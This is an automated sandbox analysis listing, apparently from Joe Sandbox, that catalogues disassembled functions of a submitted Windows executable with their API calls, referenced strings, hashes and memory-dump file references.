Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$e+000$gfff
API String ID: 3215553584-2620144452
Opcode ID: 76aaca144a6baf72679b3af93a073bfe493d5b37d98b82a3d2e8819b5ab7d9cf
Instruction ID: fc7d89762366cb6ebb075b387a354b177f2af0dc791dd698f555d6271c17047c
Opcode Fuzzy Hash: 76aaca144a6baf72679b3af93a073bfe493d5b37d98b82a3d2e8819b5ab7d9cf
Instruction Fuzzy Hash: D661F6727147C486E7269F36D9413D97B92E386BD0F588621EBA847BE9CB3DC454CB00

Function 00000001400590CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001400590F3
_invalid_parameter_noinfo.LIBCMT ref: 00000001400592C7

Strings

*, xrefs: 00000001400591FF
, xrefs: 0000000140059250

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 165a533ce10cf3c3863da49fda78149ecbbc3ed371f34d93616a66f59bc767c8
Instruction ID: 0831dbedac07b75562ca96f06838a5b49899b5ed136071522a3a4d753963ae43
Opcode Fuzzy Hash: 165a533ce10cf3c3863da49fda78149ecbbc3ed371f34d93616a66f59bc767c8
Instruction Fuzzy Hash: 4D518A725046559AEBA6CF3BC1483EC3BA1F34EB98F281215EB46972F9C736C881C705

Function 0000000140051A20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140051B5A

Strings

UMA.NegativeSamples.Increment, xrefs: 0000000140051A95
UMA.NegativeSamples.Histogram, xrefs: 0000000140051AE4
UMA.NegativeSamples.Reason, xrefs: 0000000140051A52

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: UMA.NegativeSamples.Histogram$UMA.NegativeSamples.Increment$UMA.NegativeSamples.Reason
API String ID: 3668304517-2026303189
Opcode ID: 07bc11eee6364c14db670f5dae5a39c5cbfe95470d7cbe3ed7c68fb595917569
Instruction ID: 68b5ad2693747201546777aec52b72101185e53cc72e1aa88fc50ea3d751a7a5
Opcode Fuzzy Hash: 07bc11eee6364c14db670f5dae5a39c5cbfe95470d7cbe3ed7c68fb595917569
Instruction Fuzzy Hash: 43316B32301A4485FB16DB26E8543EA6762A7CCBE8F508221FB5E477B6EF7DC5858700

Function 0000000140042210 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140042354

Strings

<br>, xrefs: 0000000140042299
</PRE>, xrefs: 0000000140042305
<PRE>, xrefs: 0000000140042248

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: </PRE>$<PRE>$<br>
API String ID: 3668304517-4186555117
Opcode ID: 9428163cd44cc4bffda93fa3e594fa24c37c442735ced4e4300c6290f0d7e4dc
Instruction ID: e952769f44783ae8293a878ddf3196dde4e9d3b93a755712dc5d2fd9d32d08fe
Opcode Fuzzy Hash: 9428163cd44cc4bffda93fa3e594fa24c37c442735ced4e4300c6290f0d7e4dc
Instruction Fuzzy Hash: 8531857231468482EA25CF16E50439EB362F78DBD4F859621EB5A0BBA8DF7CC1858304

Function 000000014003EE30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014003EF74

Strings

</PRE>, xrefs: 000000014003EF25
<PRE>, xrefs: 000000014003EE68
<br>, xrefs: 000000014003EEB9

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: </PRE>$<PRE>$<br>
API String ID: 3668304517-4186555117
Opcode ID: 2957c016a0978c2355952cbbca8e3432ba71f86ee9a154945bfd765ebf764364
Instruction ID: ba53ec163ae92bf140d5f7a9089b849704132e11f4ca713b589a6dd8d3a22aea
Opcode Fuzzy Hash: 2957c016a0978c2355952cbbca8e3432ba71f86ee9a154945bfd765ebf764364
Instruction Fuzzy Hash: BE31767221468482EB16CB16E54839EB761F75DBD4F809611FB5A0BBE5DF7CC0858704

Function 0000000140029A62 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000140029AA3
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000140029B28

Strings

gfffffff, xrefs: 0000000140029AA9
gfffffff, xrefs: 0000000140029AF9

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Time$FileSystem
String ID: gfffffff$gfffffff
API String ID: 2086374402-161084747
Opcode ID: 51ab1dae5345ca86d3090f211f9bf60b6cb390c02350eb25bc5c6745c4e56556
Instruction ID: 7a8c147b54203ad6e2ee6c198406b8adbd00ff143e20a8e1b6f89c0c50371f75
Opcode Fuzzy Hash: 51ab1dae5345ca86d3090f211f9bf60b6cb390c02350eb25bc5c6745c4e56556
Instruction Fuzzy Hash: 0F3124B2225B4482EA42CB17F8553AA6761F7CCBE0F805122FE4E87774DE38C589C702

Function 00000001400644DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140063F94: __vcrt_getptd_noexit.LIBVCRUNTIME ref: 0000000140063F98

__DestructExceptionObject.LIBVCRUNTIME ref: 0000000140064502
RaiseException.KERNEL32 ref: 000000014006452B
__DestructExceptionObject.LIBVCRUNTIME ref: 000000014006458C

Strings

csm, xrefs: 000000014006455F

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
String ID: csm
API String ID: 2280078643-1018135373
Opcode ID: a86b74a33ef31c22047d5fb8e42474b7be5e90d90989a58f1f3d951d5faed8af
Instruction ID: 6eafe89c79f4f2742edebe05c9083db02e4a3d8b89112e03e6b867a85f2d8436
Opcode Fuzzy Hash: a86b74a33ef31c22047d5fb8e42474b7be5e90d90989a58f1f3d951d5faed8af
Instruction Fuzzy Hash: 9321F776204A9087E732DF16E44079EB761F38CBA5F144611EF9E07BA6CB39D886CB41

Function 000000014005D6E0 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,000000014005D5AA), ref: 000000014005D73D
WriteFile.KERNEL32 ref: 000000014005D843
WriteFile.KERNEL32 ref: 000000014005D884
GetLastError.KERNEL32 ref: 000000014005D8C3

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLast
String ID:
API String ID: 765721374-0
Opcode ID: b62c23a18bd25082316b3b2148f64867e30fb5205997585a1e2b5918e8be4c6e
Instruction ID: c1f4a93c4cfe146c78fa20362120c07acab3406d0485708ab0664d1a6da85f87
Opcode Fuzzy Hash: b62c23a18bd25082316b3b2148f64867e30fb5205997585a1e2b5918e8be4c6e
Instruction Fuzzy Hash: 27519B32B10A9089EB22CF76E4847ED3BB0F349B98F044116EF5A67BA9DB35C556C700

Function 0000000140013250 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140013536

Strings

user.js, xrefs: 0000000140012F7C
bz2, xrefs: 0000000140013146

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: bz2$user.js
API String ID: 3668304517-945870644
Opcode ID: 2345bd1731b1e2be69c0dae812d30860ee7ad05611c5f8e517205436ec904585
Instruction ID: 7226eebc569208d9208510a12c82b8e981e1fcc3e83243c541c6246984da8171
Opcode Fuzzy Hash: 2345bd1731b1e2be69c0dae812d30860ee7ad05611c5f8e517205436ec904585
Instruction Fuzzy Hash: A9817FB2B10B8082EE12DB16D4443AD63A1E789BF4F544715FBBD1B7E8EB7AD5818340

Function 000000014005DB18 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000000014005DC2F
GetLastError.KERNEL32 ref: 000000014005DC51

Strings

U, xrefs: 000000014005DBDB

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: c01120308d7094388e8364883cd33235fdf51c2320f7981d8ffe3fd68b0297dd
Instruction ID: 494829c3fd1d2266e3706803e7052f390df4114961dffb02ba41e95426486ed9
Opcode Fuzzy Hash: c01120308d7094388e8364883cd33235fdf51c2320f7981d8ffe3fd68b0297dd
Instruction Fuzzy Hash: B8417E32715A8086EB61DF26E8443EA77A1F7887D4F814122FF8D877A8EB79C545C740

Function 0000000140070A70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_handle_errorf.LIBCMT ref: 0000000140070BE2

Strings

powf, xrefs: 0000000140070BDB
", xrefs: 0000000140070B8D

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _handle_errorf
String ID: "$powf
API String ID: 2315412904-603753351
Opcode ID: c3f244fa447482eb3f9a5e45c89676b155ed908f9411ba16fbe05be8941a4289
Instruction ID: b616cb225e322725b1e452db82a8862418a1c5acb811f4aa022231215cab11a3
Opcode Fuzzy Hash: c3f244fa447482eb3f9a5e45c89676b155ed908f9411ba16fbe05be8941a4289
Instruction Fuzzy Hash: 9F41EF73928A80DAD371CF62E4847EAB6A0F79D38CF102319F745079A8CB79C555AB44

Function 0000000140042970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,00000001400299FC,00000000,00000000,00000000,00000000,?,0000000140015613), ref: 00000001400429E0
GetProcAddress.KERNEL32(?,?,?,?,00000001400299FC,00000000,00000000,00000000,00000000,?,0000000140015613), ref: 00000001400429F0

Strings

GetHandleVerifier, xrefs: 00000001400429E6

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: c9068f39d5fc8dc99106b09748b4581e84fd549cb415ce759f35d84ea94f4797
Instruction ID: 2faef1eeba29ae629621890f81d022661c203c917e6f6fd6386631a65ff6d81f
Opcode Fuzzy Hash: c9068f39d5fc8dc99106b09748b4581e84fd549cb415ce759f35d84ea94f4797
Instruction Fuzzy Hash: 6E11D632B0290451FE3B9B236C447F052516B9CBE4F894635BF1E577F5EE3888968214

Function 000000014002B23E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

ReleaseSRWLockExclusive.KERNEL32 ref: 000000014002B243

Part of subcall function 00000001400478F0: TlsGetValue.KERNEL32 ref: 0000000140047902

Strings

ActivityTracker.ThreadTrackers.Count, xrefs: 000000014002B2C1
ActivityTracker.ThreadTrackers.MemLimitTrackerCount, xrefs: 000000014002B309

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ExclusiveLockReleaseValue
String ID: ActivityTracker.ThreadTrackers.Count$ActivityTracker.ThreadTrackers.MemLimitTrackerCount
API String ID: 3065551114-324972283
Opcode ID: ce8677b37ff61ba2474cde6bc3e3fe95457e3a2090d1327510f92dce578cf113
Instruction ID: bfd08e04f240e3cb13afd7517c5ead57605d4698141abb8989f5efc1e4cf4509
Opcode Fuzzy Hash: ce8677b37ff61ba2474cde6bc3e3fe95457e3a2090d1327510f92dce578cf113
Instruction Fuzzy Hash: F8213C31702B0086EB629B57E89039A63A5F79CBD4F404129EF4E47BA2DF3DD995C740

Function 0000000140070C00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 0000000140070D12

Strings

pow, xrefs: 0000000140070D01
", xrefs: 0000000140070CEB

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: 5a7b12c8baaf47f61e78976307a42c5a58717a9f318859acaa962973c1196aa8
Instruction ID: 4d6baa93e8f36240f7153ba3836ca09158305c76dd93d8bda8023eb0a0d29879
Opcode Fuzzy Hash: 5a7b12c8baaf47f61e78976307a42c5a58717a9f318859acaa962973c1196aa8
Instruction Fuzzy Hash: DB212A72918AC4C6E372CF55E4417AABAA1FBDE384F202305F7860B964D7BDC5859B00

Function 00000001400701AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_set_errno_from_matherr.LIBCMT ref: 0000000140070258
_set_errno_from_matherr.LIBCMT ref: 000000014007026C

Strings

pow, xrefs: 00000001400701D3

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _set_errno_from_matherr
String ID: pow
API String ID: 1187470696-2276729525
Opcode ID: f47a2474328fc4c80ee9624fc0dd68376da809514e1eab23f90078c24c6d6fad
Instruction ID: 3e036eb5104f04d5e1d76075c9fb54a4ef489799d0e40a18e2b460908c1f5718
Opcode Fuzzy Hash: f47a2474328fc4c80ee9624fc0dd68376da809514e1eab23f90078c24c6d6fad
Instruction Fuzzy Hash: AF213B36619684CBE761CF69E44039AB7A1FB8D780F505625F78D83B6AEB3CD4008F00

Function 0000000140066884 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000001400668BD
CompareStringW.KERNEL32 ref: 0000000140066945

Strings

CompareStringEx, xrefs: 00000001400668A0, 00000001400668B1

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: c2aedfeac491e1b7b1b8bdc65e652fd1a1b298690b135c73c8dd0081396ab2be
Instruction ID: ecd0d3909df05da92b9e9ae2e2f798285a35b03321069b072c07ff9176f6ebb3
Opcode Fuzzy Hash: c2aedfeac491e1b7b1b8bdc65e652fd1a1b298690b135c73c8dd0081396ab2be
Instruction Fuzzy Hash: 83110336608B8086D761CB56F88039AB7A5F7CDBD4F14412AEF8D83B29DF38C5558B40

Function 0000000140066CC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000000140066D01
LCMapStringW.KERNEL32 ref: 0000000140066D89

Strings

LCMapStringEx, xrefs: 0000000140066CE4, 0000000140066CF5

Memory Dump Source

